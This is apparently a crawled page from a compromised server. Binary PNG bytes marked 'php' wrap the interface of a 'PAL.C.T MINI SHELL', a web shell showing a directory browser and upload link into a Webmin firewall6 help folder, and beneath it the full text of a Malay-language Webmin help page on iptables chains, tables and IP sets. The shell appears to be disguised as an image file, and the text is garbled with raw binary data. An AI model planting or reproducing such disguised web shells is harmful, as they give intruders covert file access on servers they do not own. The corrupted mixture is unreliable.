php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/firewall6/help/
upload
files >> //usr/libexec/webmin/firewall6/help/intro.ms.auto.html

<header> Firewall Linux </header><h3> Pengenalan modul </h3> Modul ini membolehkan anda mengkonfigurasi ciri firewall IPtables yang terdapat dalam siri 2.4 kernel Linux. Tidak seperti beberapa program konfigurasi firewall yang lain, bukannya membuat skrip shell yang menyiapkan firewall, ia membaca dan mengedit fail simpan dalam format yang dibaca dan ditulis oleh <tt>ipi (6) tables-restore</tt> dan <tt>ipi (6) tables-save</tt> masing <tt>-</tt> masing. <p> Sekiranya anda sudah memiliki firewall pada sistem anda yang telah disiapkan secara manual atau dari fail skrip, modul akan menawarkan untuk mengubahnya menjadi file simpanan IPtables untuk anda, dan membuat skrip yang akan dijalankan pada waktu boot untuk mengaktifkan peraturan di fail. Namun, jika anda melakukan ini maka anda tidak perlu lagi mengedit skrip peraturan firewall anda dan juga harus melumpuhkannya agar tidak berjalan pada waktu boot juga. <p><h3> Gambaran keseluruhan IPtables </h3> Setiap paket rangkaian yang masuk, keluar dari atau diteruskan oleh sistem anda diperiksa pada satu atau lebih rantai untuk menentukan apa yang akan terjadi padanya. Setiap rantai mengandungi peraturan sifar atau lebih, masing-masing mempunyai syarat (untuk menentukan paket mana yang sesuai) dan tindakan (untuk mengawal apa yang berlaku pada paket yang sepadan). Setiap rantai juga mempunyai tindakan lalai yang mengawal apa yang berlaku pada paket yang tidak sesuai dengan peraturan apa pun. <p> Setiap rantai adalah bahagian dari jadual, di mana terdapat tiga: <ul><li> <b>Penapisan paket ( <tt>penapis</tt> )</b> <br> Rantai dalam tabel ini dapat digunakan untuk mengendalikan data yang masuk ke sistem anda dari host lain di rangkaian, data yang dikirim dari sistem anda oleh pengguna dan proses, dan data yang diteruskan oleh sistem anda jika berfungsi sebagai penghala. <p><li> <b>Terjemahan alamat rangkaian ( <tt>nat</tt> )</b> <br> Jadual ini dapat digunakan untuk menyiapkan NAT atau menyamar, yang berguna jika anda ingin memberi seluruh rangkaian mesin akses ke internet melalui hanya satu alamat IP sebenar. <p><li> <b>Perubahan paket ( <tt>mangle</tt> )</b> <br> Jadual ini adalah untuk mengubah suai paket yang dihantar oleh atau dihantar dari sistem anda. <p></ul> Sebagai tambahan kepada rantai standard yang merupakan bahagian dari setiap jadual, anda juga boleh membuat rantai anda sendiri yang dapat dijalankan oleh peraturan dalam rantai bawaan. Ini berguna untuk pengelompokan dan perkongsian peraturan yang mungkin digunakan di banyak tempat. <p><h3> Halaman utama </h3> Halaman utama modul ini menyenaraikan semua rantai dan peraturan dari salah satu jadual yang tersedia, yang dipilih dari senarai di kiri atas. Di bawah adalah bahagian untuk setiap rantai dalam jadual semasa, dengan semua peraturan dalam setiap rantaian disenaraikan dan syaratnya dijelaskan dengan sebaik mungkin dari kemampuan modul. Untuk setiap rantai, anda boleh mengubah tindakan lalai menggunakan senarai juntai bawah jika rantai tersebut adalah salah satu bawaan untuk jadual, atau menghapusnya dengan butang Padam rantai jika ditentukan oleh pengguna. <p> Anda boleh mengklik mana-mana peraturan dalam rantai untuk mengeditnya, klik pada anak panah di sebelah kanan setiap baris untuk menggerakkannya ke atas atau ke bawah, atau klik pada butang Tambah peraturan untuk menambahkan yang baru. Menambah atau mengedit aturan akan membawa Anda ke halaman di mana Anda dapat memilih tindakan untuk setiap aturan, dan syarat-syarat di mana tindakan tersebut dijalankan. <p> Di bahagian bawah halaman terdapat butang untuk membuat konfigurasi firewall aktif, dengan memuatkannya ke kernel dengan perintah <tt>pemulihan-ipi (6)</tt> . Di bawahnya adalah butang untuk melakukan sebaliknya - mengambil konfigurasi yang ada di kernel dan menyediakannya untuk diedit. Akhirnya, jika pengedaran anda menyokongnya, ada butang untuk menukar sama ada firewall diaktifkan pada waktu boot atau tidak. <p><h3> Rantai penapisan </h3> Untuk kerjasama yang lebih baik dengan skrip iptables luaran, anda boleh mengecualikan rantai individu dari pemprosesan oleh firewall. Untuk melakukan ini, anda mesti memilih pemprosesan peraturan langsung dalam tetapan dan memasukkan senarai penapis, yang mengecualikan rantai yang sesuai dari pemprosesan. Rantai yang tidak dikecualikan dari penyuntingan ditandai dengan pesan &quot;tidak dikendalikan oleh firewall&quot;. <p><h3> Set IP </h3> Jadual versi ip (6) yang lebih baru menyokong pelanjutan ipset. Set IP adalah senarai alamat IP di memori utama, yang dapat dicari dengan sangat efisien dan digunakan sebagai syarat dalam peraturan. Di halaman utama, set IP yang ada yang dapat digunakan oleh peraturan ditampilkan. Namun, saat ini, tidak mungkin untuk menguruskannya di firewall. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`